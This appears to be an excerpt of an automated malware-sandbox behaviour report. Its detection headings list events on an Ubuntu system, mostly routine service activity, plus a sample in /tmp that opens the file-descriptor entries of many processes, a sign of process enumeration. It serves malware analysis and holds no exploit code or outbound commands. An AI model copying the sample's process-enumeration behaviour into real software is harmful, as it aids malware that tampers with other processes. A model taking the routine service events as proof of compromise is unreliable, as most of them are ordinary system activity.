Source: /bin/sh (PID: 5472) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5474) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5476) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5478) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5480) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5483) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5485) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5489) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5518) Grep executable: /usr/bin/grep -> grep -F .utf8 Jump to behavior
Source: /bin/sh (PID: 5635) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5637) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5640) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5642) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5644) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5646) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5651) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5655) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5755) Grep executable: /usr/bin/grep -> grep -F .utf8
Source: /bin/sh (PID: 5821) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5823) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5825) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5828) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5831) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5833) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5838) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5840) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5928) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5931) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5935) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5938) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5942) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5944) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5950) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5952) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Reads system information from the proc file system
Source: /lib/systemd/systemd-journald (PID: 5321) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5566) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5668) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5746) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5850) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5925) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 6033) Reads from proc file: /proc/meminfo
Enumerates processes within the "proc" file system
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/491/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/793/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/772/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/796/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/774/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/797/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/777/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/799/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/658/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/912/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/759/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/936/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/918/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/1/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/761/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/785/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/884/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/720/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/721/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/788/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/789/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/800/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/801/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/847/fd Jump to behavior
Source: /tmp/nSg5RM0w0d (PID: 5286) File opened: /proc/904/fd Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6021/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6020/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6033/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6024/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6046/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6049/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5961/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/6041/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/5948/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/environ
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/sched
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cgroup
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/comm
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cmdline
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/status
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/attr/current
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/sessionid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/loginuid
Source: /lib/systemd/systemd-journald (PID: 6033) File opened: /proc/1/cgroup
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/invoke-rc.d (PID: 5238) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-enabled cups.service Jump to behavior
Source: /usr/sbin/invoke-rc.d (PID: 5243) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active cups.service Jump to behavior
Source: /usr/lib/rsyslog/rsyslog-rotate (PID: 5247) Systemctl executable: /usr/bin/systemctl -> systemctl kill -s HUP rsyslog.service Jump to behavior
Creates hidden files and/or directories
Source: /usr/bin/whoopsie (PID: 5383) Directory: /nonexistent/.cache Jump to behavior
Source: /usr/lib/policykit-1/polkitd (PID: 5454) Directory: /root/.cache Jump to behavior
Source: /usr/lib/gdm3/gdm-wayland-session (PID: 5525) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) Directory: /root/.cache Jump to behavior
Source: /usr/bin/whoopsie (PID: 5567) Directory: /nonexistent/.cache Jump to behavior
Source: /usr/bin/whoopsie (PID: 5669) Directory: /nonexistent/.cache Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) Directory: /root/.cache Jump to behavior
Source: /usr/bin/whoopsie (PID: 5750) Directory: /nonexistent/.cache
Source: /usr/bin/whoopsie (PID: 5852) Directory: /nonexistent/.cache
Source: /usr/bin/whoopsie (PID: 5929) Directory: /nonexistent/.cache
Source: /usr/lib/policykit-1/polkitd (PID: 6024) Directory: /root/.cache
Source: /usr/bin/whoopsie (PID: 6029) Directory: /nonexistent/.cache
Source: /usr/bin/whoopsie (PID: 6049) Directory: /nonexistent/.cache
Sample tries to set the executable flag
Source: /usr/sbin/gdm3 (PID: 5498) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5498) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5697) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5697) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx) Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx) Jump to behavior
Executes commands using a shell command-line interpreter
Source: /usr/sbin/logrotate (PID: 5234) Shell command executed: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log " Jump to behavior
